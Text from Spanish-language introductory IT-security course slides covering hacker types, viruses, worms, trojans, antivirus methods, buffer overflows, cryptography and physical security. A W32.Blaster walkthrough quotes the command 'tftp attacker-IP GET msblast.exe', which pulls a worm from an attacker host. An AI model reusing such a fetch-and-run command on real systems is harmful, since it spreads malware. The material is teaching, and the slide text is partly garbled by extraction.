  • 7. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE)   La palabra “hacker” originalmente no tenía una connotaciyn negativa: “personas que disponían de un elevado  conocimiento tecnolygico sobre ordenadores”. La acepciyn actual del término tiene su origen el los años 50 y 60, cuando el acceso a los ordenadores era muy caro y muy limitado y, por lo tanto, la disponibilidad de tiempo de proceso estaba altamente controlada.   El colectivo hacker no es homogéneo:  • White Hat o ethical hackers: hackers especializados en metodologías de penetración cuyo objetivo es   mejorar la seguridad de los sistemas informáticos de las empresas. También conocidos como sneakers.  • Black Hat: hackers que vulneran los sistemas informáticos con intenciones maliciosas o de lucro personal.  • Grey Hat: es una combinación de White y Black Hat. Hacker que vulnera un sistema informático y se ofrece   a la empresa para solucionar el problema.  •, Scipt Kiddies: hackers con bajos conocimientos que explotan las vulnerabilidades de los sistemas informáticos con herramientas de terceros. • Hacktivist, Blue Hat, Neophyte, … 7    
  • 8. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Fases del ataque de un hacker   8    
  • 9. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   9    
  • 10. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   10    
  • 11. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   11    
  • 12. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)   12    
  • 13. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Virus   El primer virus catalogado como tal, Brain virus, escrito por Basit y Amjad Alvi en Pakistan, apareció en el año 1986. Estos virtuosos desarrolladores de software crearon a Brain con la única intención de proteger, ante el emergente "pirateo", los programas que ellos mismos creaban y comercializaban en su tienda Brain Computer Services. No tenía payload.   Este virus, inusualmente dañino fue problemático para los usuarios del sistema operativo MS-DOS. Se alojaba en el Boot o sector de arranque de los disquetes de 5.25 pulgadas que contenían el sistema operativo en una versión inferior a la 2.0, En una primera instancia, cambiaba la etiqueta de volumen en los disquetes por la de (c)Brain o similar (atendiendo a la versión) y antes de producir la infección mostraba el siguiente mensaje:   ¿Cómo se replican los virus?   Memory    Chicks.exVirus  Hard  Drive     Draw.exe    Calc.exe    Chicks.exVirus     13    
  • 14. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Cómo se replican los virus?   Memory    Chicks.exVirus  Hard  Drive     Chicks.exVirus  Draw.exe     Calc.exe    Chicks.exVirus     Chicks.exVirus     Memory  Virus    Hard  Drive    Draw.exe     Calc.exe    Chicks.exVirus    
  • 15. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Cómo se replican los virus?   Chicks.exVirus     Chicks.exVirus     MemoryCalc.exe  Virus    Hard  Drive    Draw.exe     Calc.exeVirus    Chicks.exVirus     Memo  Virus    Hard  DriveDraw.exe     Calc.exeVirus    Chicks.exVirus    
  • 16. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Payload   La gran mayoría de virus no contienen payload, efectos secundarios intencionados, generalmente impiden la ejecución del fichero infectado solamente. Los payloads más comunes son:  • Modificar Datos • Exportar Datos • Grabar voz y exportar • Capturas de teclado y exportar • Interceptar comunicaciones y exportar • Cifrado de los datos locales • Destrucción de los datos locales • Marcado telefónico • Insertar otro código malicioso • Exportar Passwords Existen más de 70.000 virus distintos, pero los más comunes son los basados en WIN32.   Técnicas de ocultación de los virus   • Cifrado  • Stealth: habilidad para devolver información falsa y así   no ser detectados  • Retrovirus: atacan directamente al software antivirus. Normalmente borran, cambian las firmas o paran los   servicios del antivirus.  • Polimorfismo: habilidad de mutar cada vez que infectan una aplicación, disco o documento. Algunos pueden   llegar a tener hasta millones de formas diferentes. Este tipo de virus es más difícil de detectar por los antivirus.   Stealth  Virus     La casa  está por   allí…   Todo  parece estar bien   16    
  • 17. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Antivirus   Los Antivirus utilizan firmas de virus para la identificación. Esta firmas son únicas para cada virus, como la huella digitales son únicas para los humanos. El antivirus tiene una base de datos de firmas que se va actualizando.   Heurística: técnicas que se emplean para conocer código malicioso que no se encuentra en su base de datos. Su importancia radica en el hecho de ser la única defensa automática posible frente a la aparición de nuevos códigos maliciosos de los que no se posea firmas.   Un antivirus está formado por las firmas o definiciones de virus, motor y la aplicación.   Para saber si tu antivirus está funcionando correctamente crea un fichero .txt con el siguiente contenido:  X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*. No es un virus real, pero tu antivirus lo detectará como tal. (www.eicar.com)   Métodos de análisis de virus   BlackBox  1. Se instalan varios programas de monitorización: monitorización del sistema de ficheros, registro, memoria, actividad en la red, …  2. Se ejecuta el virus  3. Se comprueban los resultados de los programas de monitorización   17    
  • 18. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Métodos de análisis de virus WhiteBox   Script virus son normalmente fáciles: se analiza el contenido de los scripts  Macro virus son normalmente fáciles: se extrae el código macro del documento. Se analiza el contenido de las macros  El codigo Binario puede ser complicado: programa Disassemble main() {  demo.c   printf ("Demo n");   return 0; Compilador }   demo.exe   0E 1F BA 0E 00 B4 09 CD 21 B8 Demo   demo.exe   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21  54 68 69 73 20 70 72 6F 67 72 61 6D 20 63  61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07  00 00 00 83 C4 04 33 C0 5D C3 93 11 04 55   4C CD 21  54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07 00 00 00 83 C4 04 33 C0 5D C3 demo.c1 04 55   Tenemos la necesidad de dar   Assembler 3591:0000 0E PUSH CS   información detallada tan rápido como sea posible a nuestro clientes:  • WhiteBox es más lento pero más   detallado y exacto  • BlackBox es más rápido pero   menos detallado y exacto   main()   {   printf ("Demo de postgrado n")  return 0;  }   3591:0001 1F POP DS  3591:0002 BA0E00 MOV DX,000E 3591:0005 B409 MOV AH,09  3591:0007 CD21 INT 21  3591:0009 B8014C MOVAX,4C01 3591:000C CD21 INT 21   18    
  • 19. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Worms (gusanos)   Un worm es un programa que se copia de un PC a otro. A diferencia de los virus, los worms no son parásitos y no necesitan un host para infectar. Conocen la red y/o Internet. Se expanden a muchos PCs muy rápido . Necesitan menos intervención del humano para replicarse. Ejemplos: VBS.LoveLetter.A ; SQLexploit, Blaster ...   ILOVEYO     LISA  !!!  ILILOVEYOU     ILOVEYO     ILOVEYOU     YOU     ILOVEYOU     OU    ILOV     Payload   VEY     ILOV     Steve acaba de enviar LoveLetter a todos en su libreta de direcciones   • Expande el worm a TODO EL MUNDO en tu Microsoft Outlook address book vía Email o por mIRC   (Internet Chat): a todos tus amigos, todos en tu empresa, todos tus clientes…  • Sobrescribe tus ficheros locales/red con las siguientes extensiones con el código del worm y añade la   extensión VBS vbs, vbe, js, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com,  mp3 and mp2 (Ejemplo. hello.gif -> hello.gif.vbs)  • Cambia la pagina de inicio de Microsoft Internet Explorer para bajar Password Stealer Trojan. Tu información   RAS, ISP se envía al hacker. Modificaciones del Registro: sistema inestable debido a los cambios en el registro   19    
  • 20. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Cómo se replican los gusanos? (Buffer overflow)   Es  un  error  de  soFware  que  se  produce  cuando  un  programa  no  controla  adecuadamente  la  canJdad  de  datos  que  se    copian  sobre  un  área  de  memoria  reservada  a  tal  efecto  (buffer),  de  forma  que  si  dicha  canJdad  es  superior  a  la  capacidad preasignada  los  bytes  sobrantes  se  almacenan  en  zonas  de  memoria  adyacentes,  sobrescribiendo  su  contenido  original.  Esto consJtuye  un  fallo  de  programación.     En  las  arquitecturas  comunes  de  computadoras  no  existe  separación  entre  las  zonas  de  memoria  dedicadas  a  datos  y  las    dedicadas  a  programa,  por  lo  que  los  bytes  que  desbordan  el  buffer  podrían  grabarse  donde  antes  había  instrucciones,  lo  que implicaría  la  posibilidad  de  alterar  el  flujo  del  programa,  llevándole  a  realizar  operaciones  imprevistas  por  el  programador original.  Esto  es  lo  que  se  conoce  como  una  vulnerabilidad.     Es el área de memoria que se usa para mantener temporalmente la información. La pila del pc es un área de memoria re-escribible que dinámicamente se encoge o estira según lo necesite o determine el programa en ejecución. La acción de poner y quitar información de la pila funciona como LIFO. (Last In, First Out)   Para prevenir BufferOverflows:  • El usuario necesita que se saque un parche • Los desarrolladores deberían escribir código si errores • Análisis de código buscando código sospechoso • Compiladores que buscan o previenen stack overflows   20    
  • 21. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de ataque: W32.Blaster   El pc infectado busca por la red pc´s que estén escuchando en el puerto 135   Cuando descubre un PC escuchando el puerto 135 , el pc atacante intenta explotar el RPC Buffer Overflow   El Buffer Overflow incluye código que hace que la victima abra un command shell , y se ponga a escuchar al puerto 4444   El el atacante empieza un TFTP en el puerto 69 (el cliente TFTP esta incluido en las instalaciones por defecto), conecta al puerto 4444 y lanza el comando “tftp attacker-IP GET msblast.exe”   21    
  • 22. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Ejemplo de ataque: W32.Blaster   El cual ejecuta la victima, y entonces se baja una copia del worm desde el atacante.A continuación lo ejecuta (el puerto 4444 no permanece abierto)   La victima es ahora un atacante y empieza su proceso de búsqueda, la máquina atacante primera, vuelve a la búsqueda otra vez.   22    
  • 23. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   ¿Es difícil hacer un virus/gusano?   En Internet se pueden encontrar herramientas para generar tus propios virus o worms   23    
  • 24. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Troyanos   Código que generalmente muestra una aplicación afable al usuario y que de forma paralela ejecuta otra maliciosa en background. Esta aplicación maliciosa suele abrir un puerto de conexión para que un hacker pueda conectarse a la máquina infectada (backdoor) o lanza una conexión cliente contra el server de un hacker con el mismo propósito.   24    
  • 25. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Troyanos   ¿Es difícil crear un troyano?   Esheep.exe   25    
  • 26. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   Ahora el código malware utiliza varios métodos para expandirse (mail, Irc, red, ...) y cada vez necesitan menos la interacción del usuario, como hacer doble click en el fichero adjunto. Algunos ejemplos de amenazas mixtas son: Codered , nimda, bugbear.B   26    
  • 27. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   27    
  • 28. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   28    
  • 29. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   29    
  • 30. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Las amenazas mixtas   30    
  • 31. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   3. SEGURIDAD FÍSICA   Consiste en la aplicación de barreras físicas y procedimientos de control como medidas de prevención y contramedidas contra las amenazas a los recursos y la información confidencial.   En muchas organizaciones se suelen tomar medidas para prevenir o detectar accesos no autorizados o negaciones de servicio, pero rara vez para prevenir la acción de un atacante que intenta acceder físicamente a la sala de  operaciones o al lugar donde se depositan las impresiones del sistema. Esto motiva que en determinadas  situaciones un atacante se decline por aprovechar vulnerabilidades físicas en lugar de lógicas, ya que posiblemente le sea más fácil robar una cinta con una imagen completa del sistema que intentar acceder a él mediante fallos en el software.   En entornos habituales suele ser suficiente con un poco de sentido común para conseguir una mínima seguridad  física; de cualquier forma, en cada institución se ha de analizar el valor de lo que se quiere proteger y la probabilidad de las amenazas potenciales, para en función de los resultados obtenidos diseñar un plan de seguridad adecuado. Por ejemplo, en una empresa ubicada en Valencia quizás parezca absurdo hablar de la prevención ante terremotos (por ser esta un área de bajo riesgo), pero no sucederá lo mismo en una universidad situada en una zona sísmicamente activa; de la misma forma, en entornos de I+D es absurdo hablar de la prevención ante un ataque nuclear, pero en sistemas militares esta amenaza se ha de tener en cuenta.   Amenazas al hardware de una instalación informática:   • Acceso físico a los sistemas con autenticación basado en algo que el usuario sabe (clave), posee (tarjeta) o/y es (biometría). Los sistemas, equipos de comunicación, cableado troncal y conexión con los proveedores de servicio de voz y datos deben estar cerrados bajo llave en un recinto acondicionado climatológicamente (CPD-Centro de procesado de Datos) con un sistema de autenticación basado en al menos uno de los métodos mencionados. Otros: videocámaras, alarmas, detectores de presencia y térmicos, …  • Desastres naturales: terremotos, tormentas eléctricas, inundaciones, incendios, humedad, ruido eléctrico, temperaturas extremas, … Como medida de prevenciyn se aconseja realizar backups periódicamente de la información y trasladarla físicamente a otro lugar.   Es importante mantener a los empleados y al personal de seguridad alerta ante ataques de ingeniería social, shoulder surfing, masquerading, scavenging y actos delictivos.   31    
  • 32. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   3. SEGURIDAD FÍSICA   32    
  • 33. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   Seguridad en el uso de software y los sistemas, la protección de los datos, procesos y programas, así como la del acceso ordenado y autorizado de los usuarios a la información.   Objetivos:   • Restringir el acceso a los programas y archivos.  • Asegurar que los operadores puedan trabajar sin una supervisión minuciosa y no puedan modificar los   programas ni los archivos que no correspondan.  • Asegurar que se estén utilizados los datos, archivos y programas correctos en y por el procedimiento correcto.  • Que la información transmitida sea recibida sólo por el destinatario al cual ha sido enviada y no a otro.  • Que la información recibida sea la misma que ha sido transmitida.  • Que existan sistemas alternativos secundarios de transmisión entre diferentes puntos.  • Que se disponga de pasos alternativos de emergencia para la transmisión de información.   CRIPTOGRAFÍA                                 Cuanto mayor es la longitud de la clave menor es la probabilidad de crackeo   33    
  • 34. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en las comunicaciones   IDEA,  RC5,  DES,  3DES,  AES     34    
  • 35. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en las comunicaciones   Diffie-­‐Hellman,  RSA,    Massey-­‐Omura,  Elgamal, Miller     35    
  • 36. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en las comunicaciones   Se  pueden  definir  como  documentos  digitales  firmados  por  una  enJdad  tercera  confiable  (PKI)que  conJene   una  clave  privada  totalmente  transparente  para  el  usuario,  y  que  conJenen  información  sobre  este,     compuestos  ademas  por  una  clave  publica,  donde  aparece  información  del  propietario  de  dicha  clave.  Con     lo  anterior,  lo  que  se  pretende  es  asociar  la  clave  publica  con  la  idenJdad  de  una  persona  fisica  o  juridica  y     por  lo  tanto  poder  probar  la  autenJcidad  del  remitente  de  un  documento  firmado  electronicamente.       36    
  • 37. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA     36    
  • 38. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   37    
  • 39. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   38    
  • 40. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   39    
  • 41. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   40    
  • 42. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   41    
  • 43. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   42    
  • 44. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   43    
  • 45. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Confidencialidad en los datos almacenados   44    
  • 46. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Algoritmos de hash (integridad de los datos): no necesitan una clave   45    
  • 47. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Algoritmos de hash (integridad de los datos)   46    
  • 48. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   CRIPTOGRAFÍA   Las firmas digitales garantizan la integridad y la autenticidad del mensaje: 1.  Se pasan los datos por un algoritmo de hash que genera una cadena de bits que son anexados a los datos. 2. Antes de de enviar el mensaje se cifra con un algoritmo asimétrico utilizando la clave privada del remitente. La firma digital además permite añadir un sello temporal o timestamp que permite determinar si el mensaje ha sido interceptado. Esto es importante por ejemplo en transacciones económicas.   46    
  • 49. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   47    
  • 50. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   48    
  • 51. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   49    
  • 52. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   50    
  • 53. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   51    
  • 54. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   52    
  • 55. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   53    
  • 56. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   54    
  • 57. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   55    
  • 58. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   56    
  • 59. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   57    
  • 60. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   58    
  • 61. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   59    
  • 62. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   60    
  • 63. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   ACCESO AL ORDENADOR   61    
  • 64. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   62    
  • 65. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   63    
  • 66. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   64    
  • 67. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   65    
  • 68. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   AUTENTICACIÓN DE LOS USUARIOS   66    
  • 69. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   67    
  • 70. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   68    
  • 71. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   69    
  • 72. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   70    
  • 73. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   4. SEGURIDAD LÓGICA   BACKUPS   71